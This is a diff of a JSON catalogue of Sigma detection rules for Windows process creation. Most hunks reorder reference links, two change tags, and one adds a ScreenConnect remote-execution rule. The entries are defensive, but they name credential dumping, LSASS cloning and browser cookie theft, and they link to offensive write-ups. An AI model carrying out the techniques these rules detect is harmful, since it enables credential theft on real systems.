"https://blog.cyble.com/2022/04/21/prynt-stealer-a-new-info-stealer-performing-clipper-and-keylogger-activities/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1539/T1539.md#atomic-test-1---steal-firefox-cookies-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlite_firefox_gecko_profile_data.yml" ], "tags": [ @@ -53120,11 +53198,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md", + "https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets", + "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml" ], "tags": [ @@ -53367,9 +53445,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.hhs.gov/sites/default/files/manage-engine-vulnerability-sector-alert-tlpclear.pdf", "https://www.trendmicro.com/en_us/research/22/d/spring4shell-exploited-to-deploy-cryptocurrency-miners.html", "https://github.com/redcanaryco/atomic-red-team/blob/02cb591f75064ffe1e0df9ac3ed5972a2e491c97/atomics/T1057/T1057.md#atomic-test-6---discover-specific-process---tasklist", - "https://www.hhs.gov/sites/default/files/manage-engine-vulnerability-sector-alert-tlpclear.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_recon_pipe_output.yml" ], "tags": [ @@ -53438,8 +53516,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/SBousseaden/status/1464566846594691073?s=20", - "https://twitter.com/Hexacorn/status/1420053502554951689", "https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/", + "https://twitter.com/Hexacorn/status/1420053502554951689", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lsass_process_clone.yml" ], "tags": [ @@ -53480,8 +53558,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/", "https://twitter.com/0gtweet/status/1674399582162153472", + "https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_provlaunch_susp_child_process.yml" ], "tags": [ @@ -53514,11 +53592,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/dcomexec.py", - "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/atexec.py", "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/wmiexec.py", "https://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html", "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/smbexec.py", + "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/atexec.py", + "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/dcomexec.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_impacket_lateral_movement.yml" ], "tags": [ @@ -53594,9 +53672,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini", "https://lolbas-project.github.io/lolbas/Binaries/Regini/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini_execution.yml" ], "tags": [ @@ -53633,7 +53711,7 @@ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml" ], "tags": [ - "attack.execution", + "attack.defense_evasion", "attack.t1218" ] }, @@ -53662,17 +53740,17 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow", - "https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4", - "https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf", - "https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware", - "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", "https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/", "https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/", + "https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4", + "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow", + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", + "https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware", + "https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_diskshadow_script_mode_susp_location.yml" ], "tags": [ - "attack.execution", + "attack.defense_evasion", "attack.t1218" ] }, @@ -53701,10 +53779,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://isc.sans.edu/diary/22264", + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", - "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", - "https://isc.sans.edu/diary/22264", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml" ], "tags": [ @@ -53781,8 +53859,8 @@ "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/file/02e8e8c5d430d8b768980f517b62d7792d690982b9ba0f7e04163cbc1a6e7915", - "https://security.stackexchange.com/questions/210843/is-it-possible-to-change-original-filename-of-an-exe", "https://github.com/electron/rcedit", + "https://security.stackexchange.com/questions/210843/is-it-possible-to-change-original-filename-of-an-exe", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_rcedit_execution.yml" ], "tags": [ @@ -53944,8 +54022,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11)", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntdsutil_susp_usage.yml" ], "tags": [ @@ -53979,8 +54057,8 @@ "logsource.product": "windows", "refs": [ "https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation", - "https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx", "https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1003.005/T1003.005.md#atomic-test-1---cached-credential-dump-via-cmdkey", + "https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml" ], "tags": [ @@ -54013,8 +54091,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_susp_execution_via_office_process.yml" ], "tags": [ @@ -54064,10 +54142,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://isc.sans.edu/diary/22264", + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", - "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", - "https://isc.sans.edu/diary/22264", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml" ], "tags": [ @@ -54219,8 +54297,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/outflanknl/NetshHelperBeacon", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.007/T1546.007.md", + "https://github.com/outflanknl/NetshHelperBeacon", "https://web.archive.org/web/20160928212230/https://www.adaptforward.com/2016/09/using-netshell-to-execute-evil-dlls-and-persist-on-a-host/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml" ], @@ -54256,13 +54334,13 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://github.com/802-1x/Compliance/blob/2e53df8b6e89686a0b91116b3f42c8f717dca820/Ping%20Castle/Get-PingCastle-HTMLComplianceReport.ps1#L8", "https://github.com/projectHULK/AD_Recon/blob/dde2daba9b3393a9388cbebda87068972cc0bd3b/SecurityAssessment.ps1#L2699", "https://github.com/fengjixuchui/Start-ADEnum/blob/e237a739db98b6104427d833004836507da36a58/Functions/Start-ADEnum.ps1#L450", "https://github.com/vletoux/pingcastle", - "https://github.com/802-1x/Compliance/blob/2e53df8b6e89686a0b91116b3f42c8f717dca820/Ping%20Castle/Get-PingCastle-HTMLComplianceReport.ps1#L8", - "https://github.com/EvotecIT/TheDashboard/blob/481a9ce8f82f2fd55fe65220ee6486bae6df0c9d/Examples/RunReports/PingCastle.ps1", "https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/", "https://github.com/lkys37en/Start-ADEnum/blob/5b42c54215fe5f57fc59abc52c20487d15764005/Functions/Start-ADEnum.ps1#L680", + "https://github.com/EvotecIT/TheDashboard/blob/481a9ce8f82f2fd55fe65220ee6486bae6df0c9d/Examples/RunReports/PingCastle.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_pingcastle.yml" ], "tags": [ @@ -54295,9 +54373,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", - "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", "https://isc.sans.edu/diary/22264", + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_extensions.yml" ], "tags": [ @@ -54340,9 +54418,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/", - "https://twitter.com/nas_bench/status/1534916659676422152", "https://twitter.com/nas_bench/status/1534915321856917506", + "https://twitter.com/nas_bench/status/1534916659676422152", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_adplus_memory_dump.yml" ], "tags": [ @@ -54567,10 +54645,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab", "https://twitter.com/nas_bench/status/1537896324837781506", - "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd", "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0", + "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd", + "https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_susp_cab_options.yml" ], "tags": [ @@ -54603,10 +54681,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/", - "https://lolbas-project.github.io/lolbas/Binaries/Teams/", "https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf", + "https://lolbas-project.github.io/lolbas/Binaries/Teams/", "https://chromium.googlesource.com/chromium/chromium/+/master/content/public/common/content_switches.cc", + "https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/", "https://lolbas-project.github.io/lolbas/Binaries/Msedge/", "https://positive.security/blog/ms-officecmd-rce", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_electron_exeuction_proxy.yml" @@ -54713,8 +54791,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msxsl_remote_execution.yml" ], "tags": [ @@ -54814,10 +54892,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/", - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7", "https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml" ], "tags": [ @@ -54966,9 +55044,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/prevent-windows-store-lm-hash-password", "https://www.sans.org/blog/protecting-privileged-domain-accounts-lm-hashes-the-good-the-bad-and-the-ugly/", "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a", - "https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/prevent-windows-store-lm-hash-password", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_nolmhash.yml" ], "tags": [ @@ -55078,9 +55156,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", "https://redcanary.com/threat-detection-report/threats/qbot/", "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", - "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml" ], "tags": [ @@ -55113,9 +55191,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject", - "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=mssql-mimikatz", + "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", + "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject", "https://mpgn.gitbook.io/crackmapexec/smb-protocol/authentication/checking-credentials-local", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_execution.yml" ], @@ -55193,10 +55271,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/", "https://adsecurity.org/?p=2604", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1", + "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_set_policies_to_unsecure_level.yml" ], "tags": [ @@ -55336,8 +55414,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/microsoft/Windows-classic-samples/blob/7cbd99ac1d2b4a0beffbaba29ea63d024ceff700/Samples/Win7Samples/winbase/vss/vsssampleprovider/register_app.vbs", "https://twitter.com/sblmsrsn/status/1456613494783160325?s=20", + "https://github.com/microsoft/Windows-classic-samples/blob/7cbd99ac1d2b4a0beffbaba29ea63d024ceff700/Samples/Win7Samples/winbase/vss/vsssampleprovider/register_app.vbs", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolscript_register_app.yml" ], "tags": [ @@ -55454,8 +55532,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2020/06/21/snatch-ransomware/", "https://web.archive.org/web/20201124182207/https://github.com/yosqueoy/ditsnap", + "https://thedfirreport.com/2020/06/21/snatch-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_ditsnap.yml" ], "tags": [ @@ -55523,8 +55601,8 @@ "logsource.product": "windows", "refs": [ "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", - "https://www.gpg4win.de/documentation.html", "https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/", + "https://www.gpg4win.de/documentation.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gpg4win_decryption.yml" ], "tags": [ @@ -55547,8 +55625,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", "https://www.youtube.com/watch?v=ro2QuZTIMBM", + "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_sysinternals_psexec_service.yml" ], "tags": [ @@ -55571,9 +55649,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/", "https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf", + "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml" ], "tags": [ @@ -55663,8 +55741,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http", + "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cli_obfuscation_unicode.yml" ], "tags": [ @@ -55798,10 +55876,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/wunderwuzzi23/firefox-cookiemonster", "https://github.com/defaultnamehere/cookie_crimes/", - "https://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/", + "https://github.com/wunderwuzzi23/firefox-cookiemonster", "https://yoroi.company/wp-content/uploads/2022/05/EternityGroup_report_compressed.pdf", + "https://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_remote_debugging.yml" ], "tags": [ @@ -55901,8 +55979,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/blackorbird/status/1140519090961825792", "https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html", + "https://twitter.com/blackorbird/status/1140519090961825792", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_double_extension.yml" ], "tags": [ @@ -55935,10 +56013,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/Z3Jpa29z/status/1313742350292746241?s=20", "https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf", "https://lolbas-project.github.io/lolbas/Libraries/Setupapi/", "https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf", - "https://twitter.com/Z3Jpa29z/status/1313742350292746241?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_setupapi_installhinfsection.yml" ], "tags": [ @@ -56004,9 +56082,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://badoption.eu/blog/2023/01/31/code_c2.html", - "https://code.visualstudio.com/docs/remote/tunnels", "https://ipfyx.fr/post/visual-studio-code-tunnel/", + "https://code.visualstudio.com/docs/remote/tunnels", + "https://badoption.eu/blog/2023/01/31/code_c2.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vscode_tunnel_service_install.yml" ], "tags": [ @@ -56039,8 +56117,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_guid_task_name.yml" ], "tags": [ @@ -56126,6 +56204,41 @@ "uuid": "c49c5062-0966-4170-9efd-9968c913a6cf", "value": "Stop Windows Service Via PowerShell Stop-Service" }, + { + "description": "Detects potentially suspicious child processes launched via the ScreenConnect client service.\n", + "meta": { + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @Kostastsale", + "creation_date": "2022/02/25", + "falsepositive": [ + "If the script being executed make use of any of the utilities mentioned in the detection then they should filtered out or allowed." + ], + "filename": "proc_creation_win_remote_access_tools_screenconnect_remote_execution_susp.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", + "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708", + "https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_remote_execution_susp.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", + "value": "Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution" + }, { "description": "Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll", "meta": { @@ -56173,8 +56286,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/takeown", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md#atomic-test-1---take-ownership-using-takeown-utility", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/takeown", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_takeown_recursive_own.yml" ], "tags": [ @@ -56207,8 +56320,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml" ], "tags": [ @@ -56274,9 +56387,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/512c1352-6380-4436-b27d-bb62f0c020d6/", "https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf", "https://twitter.com/RedDrip7/status/1506480588827467785", + "https://app.any.run/tasks/512c1352-6380-4436-b27d-bb62f0c020d6/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_susp_pattern.yml" ], "tags": [ @@ -56342,8 +56455,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", "https://github.com/deepinstinct/Lsass-Shtinkering", + "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_werfault_lsass_shtinkering.yml" ], "tags": [ @@ -56451,8 +56564,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/", "https://github.com/LOLBAS-Project/LOLBAS/pull/180", + "https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_customshellhost.yml" ], "tags": [ @@ -56485,9 +56598,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08", "https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf", "https://redcanary.com/blog/child-processes/", + "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dllhost_no_cli_execution.yml" ], "tags": [ @@ -56555,8 +56668,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/bopin2020/status/1366400799199272960", "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", + "https://twitter.com/bopin2020/status/1366400799199272960", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_createdump.yml" ], 